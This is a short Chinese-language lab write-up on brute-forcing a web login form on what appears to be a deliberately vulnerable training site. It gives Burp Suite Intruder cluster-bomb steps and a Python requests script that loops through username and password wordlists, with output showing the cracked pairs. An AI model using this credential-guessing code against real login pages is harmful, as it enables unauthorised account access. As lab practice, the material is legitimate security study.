暴力破解用户名与密码
实验地址:基于表单的暴力破解
1.随意输入用户名与密码。
2.通过burp抓包。
3.将包发送到intruder,attact type改为cluster bomb,clear清除变量,再用add添加username和password变量。
4.设置playload,playload类型设为simple list,将用户名字典用load导入,playload set 1为第一个参数,所以再将其设置成2,再导入密码字典,点击start attack开始攻击。
5.通过返回的长度判断,一般情况下长度不等的则破解成功,尝试了一番,length为57663的密码正确为admin 123456和test abc123
还可以使用python的import模块
首先写一个可以实现用post提交用户名与密码
import requests
url = 'https://www.bihuoedu.com/vul/burteforce/bf_form.php'
post = {
'username':'admin',
'password':'123456',
'submit':'Login'
}
data=requests.post(url,post)
if 'success' in data.text:
print('ok')
ok
Process finished with exit code 0
再把字典加入其中
import requests
import requests
url = 'https://www.bihuoedu.com/vul/burteforce/bf_form.php'
for a in open('username.txt'):
for b in open('password.txt'):
aa=a.replace('\n','')
bb=b.replace('\n','')
post = {
'username':aa,
'password':bb,
'submit':'Login'
}
data=requests.post(url,post)
if 'success' in data.text:
print(aa+'|'+bb+'|'+'ok')
admin|123456|ok
test|abc123|ok
Process finished with exit code 0